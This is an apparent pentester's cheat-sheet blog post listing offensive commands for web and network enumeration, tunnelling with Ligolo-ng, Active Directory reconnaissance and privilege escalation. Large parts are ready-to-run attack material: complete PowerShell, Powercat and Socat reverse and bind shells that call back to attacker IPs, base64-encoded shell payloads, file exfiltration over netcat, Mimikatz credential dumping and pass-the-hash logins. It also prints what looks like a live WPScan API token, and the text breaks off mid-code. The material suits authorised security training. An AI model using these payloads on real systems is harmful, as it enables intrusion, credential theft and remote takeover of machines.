Pentester's Toolbox

Published on 27 Oct 2023. Filed in Notes. 3845 words


1. Web Enumeration

1.1. Feroxbuster

Search for web pages with the .js and .html extensions; the default wordlist is used:

  feroxbuster -u http://127.0.0.1 -x js,html

1.2. Wfuzz

Wfuzz replaces the FUZZ keyword in the supplied URL (it can also be placed in headers or POST data) with each word from the wordlist, so the same tool serves for directory discovery and for parameter fuzzing.

1.3. Whatweb

Identify the technology stack that has been used to build the website:

  whatweb http://192.168.5.244

1.4. WPScan

WPScan is a WordPress security scanner.

Enumerate vulnerable WordPress plugins; the API token is needed to pull vulnerability data from the WPScan database:

  wpscan --enumerate vp --plugins-detection aggressive --url http://atomicl.net/ --api-token hmn5HXmlipsaYHcvAjv1N1t1HEMvW4AOtMSzXUO0FJI
  • --enumerate vp WPScan can enumerate many things from a WordPress site (themes, usernames, TimThumb files and more). Here we enumerate vulnerable plugins only.
  • --plugins-detection aggressive Plugin detection mode (passive, mixed or aggressive). Aggressive requests every known plugin path directly, so it is the most thorough and the noisiest.

2. Network Pivot

2.1. Ligolo-ng

Ligolo-ng establishes tunnels over a reverse TCP/TLS connection using a tun interface, so tools on the proxy side run unmodified (no SOCKS proxy or proxychains needed).

2.1.1. Configure Proxy Server and Client

  1. On a Linux proxy server, create a tun interface owned by the current user:

      sudo ip tuntap add user $(whoami) mode tun ligolo
      sudo ip link set ligolo up
  2. Add a route for the internal network that should be reached through the agent:

      sudo ip route add 192.168.216.0/24 dev ligolo
  3. Start the proxy server (it listens on port 11601 by default):

      ./ligolo-ng_proxy_0.4.4_linux -selfcert
    • -selfcert The proxy server generates a self-signed TLS certificate automatically.
  4. Start the agent on the target (victim) computer; it connects back to the proxy and needs no elevated privileges:

      .\ligolo_agent.exe -connect 192.168.45.49:11601 -ignore-cert
    • -ignore-cert The agent does not validate the proxy's certificate (needed with -selfcert, and therefore unable to detect an interposed TLS endpoint).
  5. Back on the proxy, select the agent's session and start the tunnel; from now on packets routed to the ligolo interface are carried over the agent's reverse TCP/TLS connection:

      session <session id>
      start
  6. Verify that traffic reaches the internal network through the tunnel:

      crackmapexec smb 192.168.216.0/24

2.1.2. Accessing the Proxy Server Network from Proxy Client

On the Ligolo proxy, add a listener on the agent: whatever reaches the agent on --addr is forwarded back through the tunnel to the address given in --to, which is resolved from the proxy's side (so 127.0.0.1 means the proxy host itself). This is how a host in the pivoted network can reach a listener on the attacking machine, for example to deliver a reverse shell:

  listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4444
  • --addr 0.0.0.0:1234 Listen on port 1234 on every interface of the agent host.
  • --to 127.0.0.1:4444 Forward each received connection to this address and port as seen from the proxy server.

Check the previously created listener:

  listener_list

3. Bind Shell | Reverse Shell | File Transfer

3.1. Powercat

Powercat is a Netcat implementation in PowerShell.

3.1.1. File Transfers

Server:

  sudo nc -lnvp 443 > receiving_powercat.ps1

Client:

    powercat -c 10.10.0.4 -p 443 -i C:\Users\Public\powercat.ps1
  • -i Local file to send to the Netcat listener.

3.1.2. Reverse Shells

Server:

  sudo nc -lvp 443

Client:

  powercat -c 10.10.0.4 -p 443 -e cmd.exe

3.1.3. Bind Shells

Server:

  powercat -l -p 443 -e cmd.exe

Client:

  nc 10.10.0.22 443

3.1.4. Generate Stand-Alone Payloads

Server:

  sudo nc -lvp 443

The -g flag writes a PowerShell script that works without Powercat (hence "stand-alone"); when run on the client it sends a reverse shell to the listener 10.10.0.4 on port 443:

  powercat -c 10.10.0.4 -p 443 -e cmd.exe -g > reverseshell.ps1

The -ge flag produces the same payload base64-encoded, ready to be passed to powershell.exe -EncodedCommand:

  powercat -c 10.10.0.4 -p 443 -e cmd.exe -ge > encodedreverseshell.ps1
  • -ge Emit the stand-alone script as a base64 string. This hides the payload from a casual grep but is not evasion: encoded commands are trivially decoded and are themselves a common detection trigger.

3.2. Socat

3.2.1. Chat using Socat

Server side - listen on port 443 and attach the connection to the terminal:

  sudo socat TCP4-LISTEN:443 STDOUT

Client side - connect to the same port (443), using STDIO (-) as the local end:

  socat - TCP4:<remote server's ip address>:443

3.2.2. File Transfers

Server side:

  sudo socat TCP4-LISTEN:443,fork file:secret.txt
  • TCP4-LISTEN Specifies an IPv4 listener
  • fork Creates a child process once a connection is made by a client to allow multiple connections.
  • file File to be transferred.

Client side:

  socat TCP4:10.10.0.4:443 file:received_passwords.txt,create
  • create Create a new file.

3.2.3. Reverse shell

Server side:

  socat -d -d TCP4-LISTEN:443 STDOUT
  • -d -d Increase verbosity

Client side:

  socat TCP4:10.10.0.22:443 EXEC:/bin/bash

3.2.4. Encrypted Bind Shell

Server side - use TLS to encrypt the bind shell connection. First create a self-signed certificate:

  openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt
  • req Initiate a new certificate signing request
  • -newkey Generate a new private key
  • rsa:2048 Generate an RSA key with a 2,048-bit modulus.
  • -nodes Store the private key without passphrase protection
  • -keyout Save the key to a file
  • -x509 Output a self-signed certificate instead of a certificate request
  • -days Set validity period in days
  • -out Save the certificate to a file

Once the certificate is created, combine key and certificate into the single PEM file socat expects:

  cat bind_shell.key bind_shell.crt > bind_shell.pem

Create a listener :

  sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
  • verify=0 Do not request or verify a client certificate, so any client can connect.
  • fork Spawn a child process once a connection is established.

Client side

  socat - OPENSSL:10.11.0.4:443,verify=0
  • - Use STDIO (stdin/stdout) as the local end of the connection.
  • OPENSSL Establish a TLS connection to the remote host; verify=0 skips validation of the server's self-signed certificate.

3.3. Powershell

Under the default Restricted policy on Windows clients, PowerShell scripts cannot be run. Either change the policy machine-wide from an administrator PowerShell:

  Set-ExecutionPolicy Unrestricted

OR change it for the current user only, which does not require administrator rights:

  Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser

3.3.1. File Transfers [Download files]

  powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\Public\Desktop\wget.exe')"
  • -c Run the command given in double quotes.
  • new-object This cmdlet instantiates a .NET Framework or COM object; here it creates an instance of the WebClient class.
  • WebClient A class in the System.Net namespace used to access resources identified by a URI.
  • DownloadFile A method of WebClient that downloads the remote resource to a local file.

Refer to the Microsoft System.Net reference, to see the list of all of the implemented classes and follow through to the WebClient class to visualize the structure of classes and methods used in the above command.

3.3.2. File Transfer - [Upload a file]

On the attacking machine, listen on port 4446 with Netcat and pipe the received data through base64 to decode it:

  nc -nvlp 4446 | base64 --decode > test.zip

On Windows, read the file, base64-encode it and send it to the Netcat listener:

$encoded_data=[System.Convert]::ToBase64String([io.file]::ReadAllBytes("C:\users\Public\Downloads\test.zip"));
# ReadAllBytes returns the whole file as a byte array; the same call works for any file, e.g.
# $bytes = [System.IO.File]::ReadAllBytes("C:\users\Public\mess.txt")
$socket = New-Object net.sockets.tcpclient('192.168.45.188',4446);
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$writer.WriteLine($encoded_data);
$writer.flush();
$socket.close();

3.3.3. Reverse Shells

Set a listener to receive a reverse shell from Windows machine using Powershell:

  sudo nc -lnvp 443

Send reverse shell using Powershell to Netcat listener:

  $client = New-Object System.Net.Sockets.TCPClient('192.168.1.20',443);
  $stream = $client.GetStream();
  [byte[]]$bytes = 0..65535|%{0};
  while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
  {
      $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
      $sendback = (iex $data 2>&1 | Out-String );
      $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
      $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
      $stream.Write($sendbyte,0,$sendbyte.Length);
      $stream.Flush();
  }
  $client.Close();

The command that executes each received line is iex, an alias of the Invoke-Expression cmdlet; everything the listener sends is evaluated as PowerShell.

Send a reverse shell using Powershell one-liner:

$client = New-Object System.Net.Sockets.TCPClient('192.168.1.20',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush();}$client.Close();

3.3.4. Bind Shells

  $listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);
  $listener.start();
  $client = $listener.AcceptTcpClient();
  $stream = $client.GetStream();
  [byte[]]$bytes = 0..65535|%{0};
  while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
  {
      $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
      $sendback = (iex $data 2>&1 | Out-String );
      $sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';
      $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
      $stream.Write($sendbyte,0,$sendbyte.Length);
      $stream.Flush()
  }
  $client.Close();
  $listener.Stop()

This time we create a listener object from the System.Net.Sockets.TcpListener class, bound to all network interfaces (0.0.0.0) on port 443. Once a client connects, the same loop as above executes each received line with iex and returns the output.

3.3.5. Encode to Base64

3.3.5.1. Encode PS Script

Store the script in a single-quoted here-string (@' ... '@) so that PowerShell does not expand the variables inside it:

$Reverse_shell = @'
$client = New-Object System.Net.Sockets.TCPClient('192.168.1.20',4433);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()}
$client.Close();
'@

Encode it as base64 over UTF-16LE ([Text.Encoding]::Unicode), which is the encoding powershell.exe expects for encoded commands:

$Encoded_reverse_shell = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Reverse_shell))

To execute the base64-encoded command, pass it to powershell.exe with the -EncodedCommand option (abbreviated -E):

  powershell.exe -E $Encoded_reverse_shell

3.3.5.2. Encode PS One-liner
$Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.1.218",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText =[Convert]::ToBase64String($Bytes)

$EncodedText

3.3.6. Port Scanning

The Test-NetConnection cmdlet checks whether an IP responds to ICMP and whether the specified TCP port on the target host is open. Verify that SMB port 445 is open on 192.168.5.151:

  Test-NetConnection -Port 445 192.168.5.151

We can also check for an open port by initiating a plain TCP connection ourselves, since Test-NetConnection sends additional traffic (ICMP echo among other things) that is not needed for our purposes:

  1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("192.168.5.151", $_)) "TCP port $_ is open"} 2>$null

The first 1024 integers are piped into a ForEach-Object loop, where $_ holds the current port. For each port a Net.Sockets.TcpClient object is created and Connect is called against the target; when the connection succeeds, the message naming the open port is printed, and the error from a refused connection is discarded by 2>$null. Note that Connect has no timeout, so a filtered port (no SYN/ACK, no RST) stalls the loop until the OS connection timeout expires; keep the port range small when the target sits behind a firewall.

4. Remote Shell on Windows

4.1. Impacket-wmiexec

Remote into the machine using the user's NTLM hash (pass-the-hash); the LM half of the -hashes value is left as 32 zeros because it is not used:

  impacket-wmiexec -hashes 00000000000000000000000000000000:7a38430ea6f0027ee955abed1762964b Administrator@192.168.40.222

4.2. Impacket-psexec

Remote into the machine using NTLM hash:

  impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.221.212

Remote into the machine using password:

  impacket-psexec tech/vimshi:"Salesroom!"@172.16.189.42
  • tech/vimshi Username
  • "Salesroom!" Password
  • 172.16.189.42 Host IP

4.3. Evil-winrm

Remote into the machine using the credentials of a user who is a member of Remote Management Users:

  evil-winrm -i 192.168.20.220 -u admin -p 'qwertQwertqwert42!!'
  • -u Username
  • -p Password. It is single-quoted so that bash does not apply history expansion to "!"; inside double quotes a backslash before "!" stops the expansion but is kept as part of the string, so the wrong password would be sent.

4.4. Enter-PSSession

If we have the credentials of a user who is a member of Remote Management Users, we can open an interactive session from another Windows host with the Enter-PSSession PowerShell cmdlet (WinRM, TCP 5985/5986).

4.5. Pywinrm

If we have the credentials of a user who is a member of Remote Management Users, we can also use pywinrm to remote into the machine from Linux.

Install the pywinrm package with pip:

  sudo pip install pywinrm

Create a script using the functions defined in the pywinrm package:

import winrm

session = winrm.Session('<IPorHost>', auth=('administrator', '<password here>'))

# execute the "hostname" command on the remote machine through PowerShell
result = session.run_ps("hostname")
print(result.status_code)          # 0 on success
print(result.std_out.decode())     # std_out and std_err are bytes
print(result.std_err.decode())

5. Passwords Extraction

5.1. Mimikatz

Extract passwords and hashes from all available sources:

privilege::debug
token::elevate
sekurlsa::logonpasswords
  • privilege::debug Enable SeDebugPrivilege access right.
  • token::elevate Elevate to SYSTEM user.

Extract NTLM hashes from the SAM database:

privilege::debug
lsadump::sam

Extract MSCache 1 (domain cached credential) hashes from the registry:

privilege::debug
lsadump::cache

Export all the TGT/TGS from memory and save to disk in kirbi Mimikatz format:

privilege::debug
sekurlsa::tickets /export

Over-pass-the-hash: start a process whose logon session uses ken's NTLM hash. Kerberos tickets (a TGT, then service tickets) are requested transparently as soon as that process authenticates to a domain resource:

sekurlsa::pth /user:ken /domain:corp.com /ntlm:369def78d8372408bf6e93364cd93075 /run:powershell
  • /ntlm NTLM hash of user ken.

NOTE: If we run whoami on the newly created PowerShell window, it will not display ken because the whoami utility only checks the process token and does not inspect imported Kerberos tickets.

Mimikatz one liner:

mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "lsadump::cache" "exit"

5.2. Impacket-secretsdump

Extract password hashes from SAM database file:

  impacket-secretsdump -sam SAM -system SYSTEM LOCAL

Extract password hashes from NTDS.dit database file:

  impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL

6. Linux Privilege Escalation

6.1. LinEnum - Linux PrivEsc

Enumerate privilege escalation vectors on Linux system:

  ./LinEnum.sh

Check the README file for more information.

6.2. LinPEAS - Linux PrivEsc

Enumerate privilege escalation vectors on Linux system:

  sh linpeas.sh

Check the documentation for more details.

6.3. unix-privesc-check - Linux PrivEsc

Enumerate privilege escalation vectors on Linux system:

  ./unix-privesc-check

Check the documentation for more details.

6.4. Pspy

Pspy monitors Linux processes (including cron jobs and commands run by other users) without root permissions.

7. Windows Enumeration

7.1. NET.exe

7.1.1. Local user

List all local users:

  net user

Get information about a user (about groups that user belongs to, full name, etc…):

  net user john
  • john A local user account

List users in a group:

  net localgroup Users
  • Users A local group

7.1.2. Domain user

Get information about a domain user (groups that user belongs to, full name, etc…):

  net user stevan /domain
  • stevan A domain user

7.2. PsLoggedon

The PsLoggedOn.exe tool from the Sysinternals Suite enumerates logged-on users. It uses the Remote Registry service to enumerate the keys under HKEY_USERS, which are named after the security identifiers (SIDs) of users with a loaded profile, and converts those SIDs to usernames. The Remote Registry service must therefore be running on the target machine for PsLoggedOn to work:

.\PsLoggedon.exe \\files04

7.3. Windows Privilege Escalation

7.3.1. PowerUp

PowerUp is a PowerShell script that checks for privilege escalation vectors on Windows systems.

Download and import the script before using it:

  Import-Module .\PowerUp.ps1

Get detailed information about a specified service:

  Get-ServiceDetail -Name <service name>

Enumerate services with unquoted paths:

  Get-UnquotedService

Enumerate services where the current user has write permission on the service binary:

  Get-ModifiableServiceFile

Enumerate services the current user can modify:

  Get-ModifiableService

Enumerate for DLL Hijacking:

  Find-ProcessDLLHijack

For more information check the documentation.

7.3.2. WinPEAS

A tool that enumerates privilege escalation vectors on Windows:

.\winPEAS.exe

8. AD Enumeration

8.1. PowerView

PowerView is an Active Directory enumeration tool for Windows (domain groups, users, logged-on sessions, ACLs, shares, etc.).

Import the PowerView script:

  Import-Module .\PowerView.ps1

Basic information about the domain:

  Get-NetDomain

Enumerate all domain users:

  Get-NetUser
  Get-NetUser | select cn,pwdlastset,lastlogon

Enumerate all domain groups:

  Get-NetGroup
  Get-NetGroup "IT Department" | select member

Enumerates computer objects in the domain:

  Get-NetComputer
  Get-NetComputer | select operatingsystem,dnshostname

Enumerate computers on which the current user has administrative privileges:

  Find-LocalAdminAccess

Enumerate active SMB sessions on a host (recent Windows versions require local administrator rights on the target to list them):

  Get-NetSession -ComputerName <Pc_name> -verbose

Enumerate SPNs:

  Get-NetUser -SPN
  Get-NetUser -SPN | select samaccountname,serviceprincipalname

Enumerate the Access Control Entries (ACEs) of an object:

  Get-ObjectAcl -Identity stephanie
  Get-ObjectAcl -Identity "IT Department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights

  ActiveDirectoryRights : ReadProperty
  SecurityIdentifier    : S-1-5-21-1923370270-658905905-1781884369-553

Here the group with SID S-1-5-21-1923370270-658905905-1781884369-553 (RAS and IAS Servers, RID 553) has ReadProperty rights on the queried user. This is a default configuration in AD and does not give us an attack vector; GenericAll, GenericWrite, WriteOwner, WriteDACL or ForceChangePassword entries held by a principal we control would.

Enumerate shares in the domain:

  Find-DomainShare
  Find-DomainShare -CheckShareAccess

8.2. SharpHound

SharpHound is the data collector for BloodHound. It is written in C# and uses native Windows API functions (such as NetWkstaUserEnum and NetSessionEnum) together with LDAP queries to collect data from domain controllers and domain-joined Windows systems:

  Import-Module .\Sharphound.ps1
  Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\stevan\Desktop\ -OutputPrefix "testdomain"
  • -OutputPrefix Adds testdomain prefix to the name of the output file.

8.3. BloodHound

BloodHound is used to analyze data collected by SharpHound.

List all users:

match (u:User) return u.samaccountname

Get groups with members:

MATCH (u:User)-[:MemberOf]->(g:Group) return g.samaccountname,u.samaccountname order by g.samaccountname

Get user with SPN:

MATCH (u:User) WHERE u.hasspn=true RETURN u.samaccountname, u.serviceprincipalnames, u.description

Find users that do not require Kerberos pre-authentication (AS-REP Roasting candidates):

MATCH (u:User {dontreqpreauth: true}) RETURN u

9. Active Information Gathering

9.1. DNS Enumeration

9.1.1. Host

Find the IP address of www.atomicl.net:

  host www.atomicl.net

By default, the host command looks for an A record, but we can also query other fields, such as MX or TXT records:

  host -t mx atomicl.net

Search for name server:

  host -t ns atomicl.net

9.1.2. DNSRecon

DNSRecon is an advanced DNS enumeration script written in Python:

  dnsrecon -d atomicl.net -t std
  • -d option to specify a domain name.
  • -t Type of enumeration to perform, in this case, a standard scan

DNSRecon is also capable of brute forcing subdomain using a provided word list:

  dnsrecon -d atomicl.net -D ~/wordlist.txt -t brt
  • -t brt Stands for brute force

9.1.3. DNSEnum

DNSEnum is another popular DNS enumeration tool that can be used to further automate DNS enumeration:

  dnsenum atomicl.net

9.2. Port Scanning

9.2.1. Netcat

Netcat is not a port scanner, but it can be used for basic port scanning.

9.2.1.1. TCP port scanning - complete the three-way handshake to detect open ports

  nc -nvv -w 1 -z 192.168.5.151 3388-3390
  • -w Connection timeout in seconds.
  • -z Zero-I/O mode: connect, then close without sending data.
  • 3388-3390 Port range.

9.2.1.2. UDP port scanning - send an empty UDP datagram

  nc -nv -u -z -w 1 10.11.1.115 160-162
  • -u Use UDP.

If the UDP port is open, the datagram is handed to the application; whether anything comes back depends on how that application reacts to an empty packet.

If the UDP port is closed, the target's UDP/IP stack should answer with an ICMP port unreachable message. Note: no response does not necessarily mean the port is open; the probe or the ICMP reply may have been dropped by a firewall.
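
The connect-scan logic of the Netcat commands above and of the PowerShell TcpClient loop in 3.3.6, written out in Python as an added example (not part of the original notes) so the three outcomes are explicit: a completed handshake, a RST, or silence until the timeout. The UDP probe maps the ICMP port unreachable case exactly as described (on Linux a connected UDP socket reports it as ECONNREFUSED). The demo() function only touches the loopback interface; 192.168.5.151 in the main block is the page's own example host.

```python
import errno
import socket


def tcp_probe(host, port, timeout=1.0):
    """Connect scan for one port: open if the three-way handshake completes,
    closed if the target answers with RST, filtered if nothing comes back."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))        # SYN -> SYN/ACK -> ACK, then we close
        return "open"
    except ConnectionRefusedError:     # RST: nothing is listening
        return "closed"
    except socket.timeout:             # no SYN/ACK and no RST before the timeout
        return "filtered"
    except OSError as e:               # host/network unreachable behaves like a drop
        if e.errno in (errno.EHOSTUNREACH, errno.ENETUNREACH):
            return "filtered"
        raise
    finally:
        s.close()


def udp_probe(host, port, timeout=1.0, payload=b""):
    """Empty-datagram probe: closed if an ICMP port unreachable comes back,
    open if the application answers, open|filtered if there is only silence."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))        # connected socket so ICMP errors are delivered
        s.send(payload)
        s.recv(4096)
        return "open"
    except ConnectionRefusedError:     # ICMP port unreachable surfaced by the kernel
        return "closed"
    except socket.timeout:
        return "open|filtered"
    finally:
        s.close()


def scan(host, ports, timeout=1.0):
    """Map each TCP port to its state."""
    return {p: tcp_probe(host, p, timeout) for p in ports}


def demo(host="127.0.0.1"):
    """Self-check on loopback: one listening TCP port, one port that was just
    released (so it refuses), and one bound but silent UDP port."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind((host, 0))
    listener.listen(1)
    open_port = listener.getsockname()[1]
    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tmp.bind((host, 0))
    closed_port = tmp.getsockname()[1]
    tmp.close()                         # nothing listens here any more
    udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp.bind((host, 0))                 # bound, never answers
    udp_port = udp.getsockname()[1]
    try:
        return {
            "tcp_open": tcp_probe(host, open_port, 0.5),
            "tcp_closed": tcp_probe(host, closed_port, 0.5),
            "udp_silent": udp_probe(host, udp_port, 0.5),
        }
    finally:
        listener.close()
        udp.close()


if __name__ == "__main__":
    print(demo())
    # Against the page's example host (assumed reachable from the attacking box):
    print(scan("192.168.5.151", [22, 80, 139, 445, 3389], timeout=1.0))
```

The timeout is the difference from the PowerShell one-liner: without it a single filtered port costs the full OS connect timeout, and a /24 of dropped SYNs takes hours.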

9.2.2. Nmap

  sudo nmap -sS 10.10.1.222

  • -sS SYN (half-open) scan: send a SYN and, after the SYN-ACK from an open port, answer with RST instead of the final ACK of the three-way handshake. This is the default when nmap runs with sudo/root privileges, because it needs raw sockets.
  • -sT Connect scan: complete the three-way handshake through the OS socket API. This is the default when nmap runs without root privileges, and it leaves a full connection in the target's logs.
  • -sU UDP scan: an empty UDP packet is sent and a closed port is inferred from the ICMP port unreachable reply; for common UDP services nmap sends a protocol-specific payload instead, e.g. an SNMP request to port 161.

Host discovery on the specified IP range:

  nmap -sn 10.10.1.1-254

Host discovery and save the output to grepable format:

  nmap -v -sn 10.10.1.1-254 -oG ping-sweep.txt

Scan top 20 commonly used ports:

  nmap -sT -A --top-ports=20 10.10.1.1-254 -oG top-port-sweep.txt

Commonly used ports are defined in the /usr/share/nmap/nmap-services file.

OS Fingerprinting:

  sudo nmap -O 10.10.1.220

Banner Grabbing/Service Enumeration

  nmap -sV -sT -A 10.10.1.220
  • -sV Probe open ports to determine the service and version (banner grabbing).
  • -A Aggressive scan: enables OS detection (-O), version detection (-sV), the default NSE scripts (-sC) and traceroute.

The Nmap Scripting Engine (NSE) performs tasks such as DNS enumeration, brute force attacks and vulnerability identification. NSE scripts are located in the /usr/share/nmap/scripts directory.

  nmap 10.10.1.220 --script=smb-os-discovery
  • smb-os-discovery script attempts to connect to the SMB service on a target system and determine its operating system.

Get info about a script:

  nmap --script-help dns-zone-transfer

9.3. SMB Enumeration

9.3.1. NetBIOS

NetBIOS is a service that allows applications and computers to communicate over a local area network (LAN). NetBIOS provides three distinct services:

  1. Name Service (NetBIOS-NS) for name registration and resolution. Port UDP 137.
  2. Datagram Distribution Service (NetBIOS-DGM) for connectionless communication. Port UDP 138.
  3. Session Service (NetBIOS-SSN) for connection-oriented communication on top of which SMB runs. Port TCP 139.

While modern implementations of SMB can work without NetBIOS, NetBIOS over TCP (NBT) is required for backward compatibility and is often enabled together.

For this reason, enumeration of NetBIOS and SMB services is needed:

  nmap -v -p 139,445 -oG smb.txt 10.10.1.1-254

There are also more specialized tools for identifying NetBIOS information:

  sudo nbtscan -r 10.10.1.0/24

-r: Use local port 137 for scans which is used to query the NetBIOS name service for valid NetBIOS names.

9.3.2. SMB Enumeration with Nmap

Nmap contains many useful scripts in the /usr/share/nmap/scripts/smb directory that can be used to enumerate SMB services.

E.g Attempts to determine the operating system, computer name, domain, workgroup, and current time over the SMB protocol (ports 445 or 139) using smb-os-discovery script:

  nmap -v -p 139,445 --script=smb-os-discovery 10.10.1.227
  • No space after the comma in the port list; otherwise nmap treats 445 as a second target.

-v: Increase the verbosity level.

9.3.3. SMB Enumeration with enum4linux

enum4linux enumerates SMB shares, the password policy, OS information, users, group membership and Nbtstat information, and determines whether the host is in a workgroup or a domain:

  enum4linux 192.168.207.13

9.3.4. SMB Enumeration with net view

In Windows system we can use net view to list domains, resources, and computers belonging to a given host. As an example, we can list all the shares running on dc01:

net view \\dc01 /all
  • /all lists all administrative shares which are ending with the dollar sign.
  • We can also replace host name dc01 with IP address of the system.

9.3.5. Smbclient - From Linux

Authenticate to the SMB server using an NTLM hash (pass-the-hash):

  smbclient \\\\192.168.189.248\\transfer -U john --pw-nt-hash 54abdf854v8cz653b1be3458454e5a4d

9.3.6. SMBMap - From Linux

Enumerate SMB shares using NTLM hash of a user:

  smbmap  -u username -p '54abev854d8c065vb1be3458454e4a3d' -H 192.168.189.248

9.4. SMTP Enumeration

SMTP enumeration uses the VRFY and EXPN commands. VRFY asks the server to verify that a mailbox (local user or e-mail address) exists; EXPN asks the server to expand a mailing list into its members. Both are often disabled, in which case the server answers 502, or replies with a non-committal 252 for every address.

Verify an email address by connecting to the SMTP server on port 25 using Netcat:

  nc -nv 10.10.1.217 25

  (UNKNOWN) [10.10.1.217] 25 (smtp) open
  220 it.localdomain ESMTP Postfix
  VRFY root
  252 2.0.0 root
  VRFY idontexist
  550 5.1.1 <idontexist>: Recipient address rejected: User unknown in local recipient table
  ^C

Automate the above verification process by using a Python script:


#!/usr/bin/env python3

import socket
import sys

if len(sys.argv) != 2:
    print("Usage: vrfy.py <username>")
    sys.exit(1)

# Create a socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Connect to the server
s.connect(('10.10.1.217', 25))

# Receive the banner (recv returns bytes)
banner = s.recv(1024)
print(banner.decode(errors="replace"))

# VRFY a user; SMTP commands are sent as bytes terminated by CRLF
s.send(('VRFY ' + sys.argv[1] + '\r\n').encode())
result = s.recv(1024)
print(result.decode(errors="replace"))

# Close the socket
s.close()
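
An added example (not part of the original notes) that extends the script above: it sends HELO first, checks several users in one session, interprets the reply codes (250 exists; 252 is what Postfix returns for a valid local user, as the transcript shows; 550 unknown; 502 VRFY disabled) and can be exercised offline against FakeSMTPSocket, a constructed replay of that transcript rather than a real server. The HELO name enum.local is an arbitrary assumption.

```python
import socket

# Reply code -> verdict. 252 means "cannot VRFY, will accept", which Postfix
# sends only for addresses it knows, so it still distinguishes users.
VERDICTS = {250: "exists", 252: "accepted", 550: "unknown", 551: "unknown",
            553: "unknown", 500: "disabled", 502: "disabled"}


def read_reply(sock):
    """Read one complete SMTP reply and return (code, text). Multi-line replies
    use 'NNN-' continuation lines; the final line starts with 'NNN '."""
    data = b""
    while True:
        chunk = sock.recv(4096)
        if not chunk:
            break
        data += chunk
        if data.endswith(b"\r\n"):
            last = data.rstrip(b"\r\n").split(b"\r\n")[-1]
            if len(last) >= 4 and last[3:4] == b" ":
                break
    text = data.decode("utf-8", "replace")
    return int(text[:3]), text.strip()


def vrfy_users(sock, users, helo="enum.local"):
    """Drive the VRFY exchange over a connected socket; map each user to a verdict."""
    read_reply(sock)                                # 220 banner
    sock.sendall(f"HELO {helo}\r\n".encode())       # some MTAs refuse commands before HELO/EHLO
    read_reply(sock)
    results = {}
    for user in users:
        sock.sendall(f"VRFY {user}\r\n".encode())
        code, _ = read_reply(sock)
        results[user] = VERDICTS.get(code, f"other:{code}")
    sock.sendall(b"QUIT\r\n")
    return results


def vrfy_over_network(host, users, port=25, timeout=5.0):
    """Same exchange against a live MTA."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return vrfy_users(s, users)


class FakeSMTPSocket:
    """Constructed stand-in that replays the Postfix transcript above (not a
    real server): 252 for known local users, 550 for unknown ones, and 502 when
    VRFY is disabled (disable_vrfy_command = yes in Postfix)."""

    def __init__(self, known=("root",), vrfy_disabled=False):
        self.known, self.vrfy_disabled = set(known), vrfy_disabled
        self.outbox = b"220 it.localdomain ESMTP Postfix\r\n"

    def sendall(self, data):
        verb, _, arg = data.decode().strip().partition(" ")
        if verb == "HELO":
            self.outbox += b"250 it.localdomain\r\n"
        elif verb == "VRFY" and self.vrfy_disabled:
            self.outbox += b"502 5.5.1 VRFY command is disabled\r\n"
        elif verb == "VRFY" and arg in self.known:
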